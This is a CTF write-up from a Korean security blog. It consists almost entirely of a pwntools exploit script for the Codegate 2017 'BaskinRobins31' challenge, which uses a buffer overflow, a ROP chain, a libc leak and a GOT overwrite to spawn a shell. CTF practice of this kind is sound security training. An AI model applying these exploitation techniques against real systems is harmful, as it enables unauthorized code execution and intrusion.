[Codegate 2017] BaskinRobins31

2018. 11. 30. 01:50·PWN/CTF
728x90
from pwn import *

s = process("./BaskinRobins31")
libc = ELF("./libc")
elf = ELF("./BaskinRobins31")

s.recvuntil("How many numbers do you want to take ? (1-3)")

cmd = "/bin/sh\x00"

pop_rdi = 0x00400bc3
pop_rdx = 0x0040087c
pop_rbp = 0x0040087f
pop_rsi_r15 = 0x00400bc1
main = 0x400A4B

gdb.attach(s)

pay = "A"*184
pay += p64(pop_rdi)
pay += p64(elf.got['puts'])
pay += p64(elf.plt['puts'])

pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(elf.bss()+0x10)
pay += p64(0)
pay += p64(pop_rdx)
pay += p64(len(cmd))
pay += p64(elf.plt['read'])

pay += p64(pop_rdi)
pay += p64(0)
pay += p64(pop_rsi_r15)
pay += p64(elf.got['read'])
pay += p64(0)
pay += p64(pop_rdx)
pay += p64(4)
pay += p64(elf.plt['read'])

pay += p64(pop_rdi)
pay += p64(elf.bss()+0x10)
pay += p64(elf.plt['read'])

s.sendline(pay)

s.recvuntil("Don't break the rules...:(")
s.recv(2)
puts_libc = u64(s.recv(6)+"\x00\x00")
print "puts_libc : " + hex(puts_libc)
libc_base = puts_libc - libc.symbols['puts']
system = libc_base + libc.symbols['system']
print "libc_base : " + hex(libc_base)
print "system : " + hex(system)

s.send(cmd)

s.send(p64(system))
s.interactive()


'PWN > CTF' 카테고리의 다른 글

[bsidessf-ctf-2017] shortest  (0) 2018.12.02
[BITSCTF 2017] pwn  (0) 2018.12.01
[CSAW 2016] tutorial  (0) 2018.11.29
[SHARIF 2018] OldSchool-newAge  (0) 2018.11.25
[HITCON 2016] Babyheap  (0) 2018.11.24
'PWN/CTF' 카테고리의 다른 글
  • [bsidessf-ctf-2017] shortest
  • [BITSCTF 2017] pwn
  • [CSAW 2016] tutorial
  • [SHARIF 2018] OldSchool-newAge
J1W0N
J1W0N
jijijiji
  • J1W0N
    JIWON
    J1W0N
  • 전체
    오늘
    어제
    • 분류 전체보기
      • PROGRAMMING
        • PYTHON
        • JS
        • 알고리즘
        • React
      • WEB
        • LOS
        • rubiya
      • PWN
        • pwnable.tw
        • pwnable.kr
        • CTF
        • TIP
        • wargame
        • 읽자
        • HITCON_Training
      • Security_ETC
      • REVERSING
      • 할 것 정리
      • 잡담
        • 끄적끄적
        • 영어일기
      • 정보
      • 정리
  • 블로그 메뉴

    • 홈
    • 태그
    • 미디어로그
    • 위치로그
    • 방명록
  • 링크

  • 공지사항

  • 인기 글

  • 태그

  • 최근 댓글

  • 최근 글

  • hELLO· Designed By정상우.v4.10.6
J1W0N
[Codegate 2017] BaskinRobins31
상단으로

티스토리툴바